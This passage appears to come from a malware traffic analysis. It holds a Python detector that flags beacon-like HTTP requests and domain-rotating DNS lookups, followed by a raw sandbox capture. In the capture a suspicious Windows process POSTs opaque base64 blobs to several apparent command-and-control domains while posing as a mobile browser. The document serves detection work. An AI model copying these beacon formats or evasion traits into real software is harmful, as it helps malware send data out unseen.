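     "body": "b6=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP",
     "referer": "http://www.laohub10.net/sgdd/", "ua": MOBILE_UA, "process": "CWtKbasqHVKAO.exe"},
    {"method": "GET", "host": "www.example.com", "path": "/index.html", "query": "",
     "body": "", "referer": "", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/131.0",
     "process": "chrome.exe"},
]


def domain_rotation(dns_log, min_distinct=5, tolerance=0.3):
    """Per source IP: first-seen time of every distinct query name, then whether
    *new* names keep appearing at a regular cadence (every gap between consecutive
    first-seen times within +/- tolerance of the median gap). A process walking an
    embedded domain list looks exactly like that; thresholds are assumptions."""
    first_seen = defaultdict(dict)
    for line in dns_log.splitlines():
        day, clock, src, name = line.split()
        ts = datetime.strptime(f"{day} {clock}", "%Y-%m-%d %H:%M:%S.%f")
        seen = first_seen[src]
        if name not in seen or ts < seen[name]:
            seen[name] = ts            # retransmits never count as a new name
    verdict = {}
    for src, names in first_seen.items():
        times = sorted(names.values())
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps) if gaps else 0.0
        regular = len(names) >= min_distinct and all(abs(g - med) <= tolerance * med for g in gaps)
        verdict[src] = {"distinct": len(names), "median_gap_s": round(med, 2), "regular": regular}
    return verdict


B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")   # assumed: 64+ chars of base64 alphabet
SHORT_DIR = re.compile(r"/[a-z0-9]{2,8}/")            # assumed: /xxr1/, /sgdd/ and the like


def opaque_params(form):
    """Names of form-encoded parameters whose value is a long base64-looking blob."""
    hits = []
    for pair in form.split("&"):
        key, sep, value = pair.partition("=")
        if sep and B64_BLOB.fullmatch(value):
            hits.append(key)
    return hits


def classify_request(req):
    """Reasons (assumed heuristics, not sandbox signatures) that a request looks
    like the beacons in sessions 0-2 above. An empty list means nothing fired."""
    reasons = []
    if re.search(r"MIDP|Android|Mobile", req["ua"]):
        reasons.append("mobile-device User-Agent sent by a Windows process")
    if opaque_params(req["query"]) or opaque_params(req["body"]):
        reasons.append("opaque base64-like parameter carrying the payload")
    if SHORT_DIR.fullmatch(req["path"]):
        reasons.append("short random-looking directory as the whole path")
    if req["referer"] and req["referer"] == f"http://{req['host']}{req['path']}":
        reasons.append("Referer is the request's own URL (no prior page)")
    return reasons


def flagged_hosts(requests, min_reasons=2):
    """Hosts whose requests tripped at least min_reasons heuristics."""
    return sorted({r["host"] for r in requests if len(classify_request(r)) >= min_reasons})


if __name__ == "__main__":
    print(domain_rotation(DNS_QUERIES))
    for r in HTTP_REQUESTS:
        print(r["method"], r["host"], classify_request(r))
    print("flagged:", flagged_hosts(HTTP_REQUESTS))
```

Cadence alone would also match a benign poller hitting one host every fifteen seconds; what separates list-walking from polling is that each interval brings a name never seen before, which is why the check keys on first-seen names and discards the retransmitted queries. The request heuristics are fingerprints of this capture and should be tuned against real proxy logs before being turned into an alert.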


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.6 | 49854 | 27.124.4.246 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:27:56.338972092 CET | 778 | OUT | POST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6a 42 38 74 7a 56 51 42 2f 6a 61 47 4a 75 64 6d 51 74 2f 79 78 73 46 7a 51 70 44 31 34 34 67 4d 54 4e 46 55 69 35 31 76 61 64 7a 67 3d 3d
                                                          Data Ascii: b6=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
                                                          Dec 3, 2024 23:27:57.694483995 CET | 525 | IN | HTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.6 | 49860 | 27.124.4.246 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:27:59.095851898 CET | 1791 | OUT | POST /sgdd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Origin: http://www.laohub10.net
                                                          Referer: http://www.laohub10.net/sgdd/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 55 52 48 6d 37 6e 6b 68 44 67 34 31 6e 63 72 36 66 5a 64 30 54 70 53 46 70 6c 53 31 73 4a 34 7a 4a 46 46 47 51 67 46 48 31 41 77 63 7a 33 4d 30 66 57 2b 76 4c 4f 76 73 4d 66 4e 2f 75 75 52 6a 61 6a 6e 77 6b 32 77 37 42 70 5a 48 48 36 33 71 4e 6e 43 2f 34 44 6d 4d 55 2f 6c 4b 53 66 6a 78 63 4c 63 71 6a 38 34 44 4f 68 51 74 6c 43 6d 68 45 65 47 5a 42 46 50 2b 69 53 36 56 65 7a 55 6f 59 49 2b 78 36 55 43 58 6e 73 4a 55 74 46 32 6e 32 5a 53 54 31 47 76 74 68 35 38 71 4e 65 53 56 6c 73 72 78 67 [TRUNCATED]
                                                          Data Ascii: b6=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhjSa [TRUNCATED]
                                                          Dec 3, 2024 23:28:00.486567974 CET | 525 | IN | HTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.6 | 49868 | 27.124.4.246 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:01.763202906 CET | 504 | OUT | GET /sgdd/?b6=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&sDDX=EfDhNx4xefjT3b5P HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.laohub10.net
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Dec 3, 2024 23:28:03.208520889 CET | 525 | IN | HTTP/1.1 200 OK
                                                          Server: Apache
                                                          Content-Type: text/html; charset=utf-8
                                                          Accept-Ranges: bytes
                                                          Cache-Control: max-age=86400
                                                          Age: 1
                                                          Connection: Close
                                                          Content-Length: 350
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                          Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.6 | 49889 | 149.88.81.190 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:09.639137030 CET | 748 | OUT | POST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30
                                                          Data Ascii: b6=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80
                                                          Dec 3, 2024 23:28:11.122781038 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:10 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.6 | 49895 | 149.88.81.190 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:12.301398039 CET | 772 | OUT | POST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 231
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d
                                                          Data Ascii: b6=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMXPK4MdfCJA9JYHcWiZUoZXsGk9RrzqDbWtLTdyArZLmQ==
                                                          Dec 3, 2024 23:28:13.841598988 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:13 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.6 | 49900 | 149.88.81.190 | 80 | 768 | C:\Program Files (x86)\iBhGRyqRKpXrfdDzTRasNpcoNNBECoBPKGZDxgrPtI\CWtKbasqHVKAO.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 23:28:14.970340967 CET | 1785 | OUT | POST /rq1s/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.xcvbj.asia
                                                          Origin: http://www.xcvbj.asia
                                                          Referer: http://www.xcvbj.asia/rq1s/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 62 36 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 78 2b 32 4a 38 50 6f 53 70 4d 76 51 32 51 79 33 4f 30 61 55 56 2b 47 63 4e 39 64 6c 78 59 59 56 49 53 4c 4f 34 54 43 55 57 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 39 76 76 4b 45 31 77 2b 31 4b 45 5a 4b 57 77 42 34 4f 76 43 37 4a 42 47 75 6f 30 35 7a 69 68 38 6c 6f 7a 41 67 38 64 6a 52 2b 58 6a 51 2b 68 6a 6d 51 47 33 71 31 4f 6e 55 52 61 46 54 37 4a 39 2b 71 63 2f 2f 66 6d 75 37 43 39 64 6c 6a 57 4b 6c 46 67 55 [TRUNCATED]
                                                          Data Ascii: b6=[TRUNCATED]
                                                          Dec 3, 2024 23:28:16.509211063 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 03 Dec 2024 22:28:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
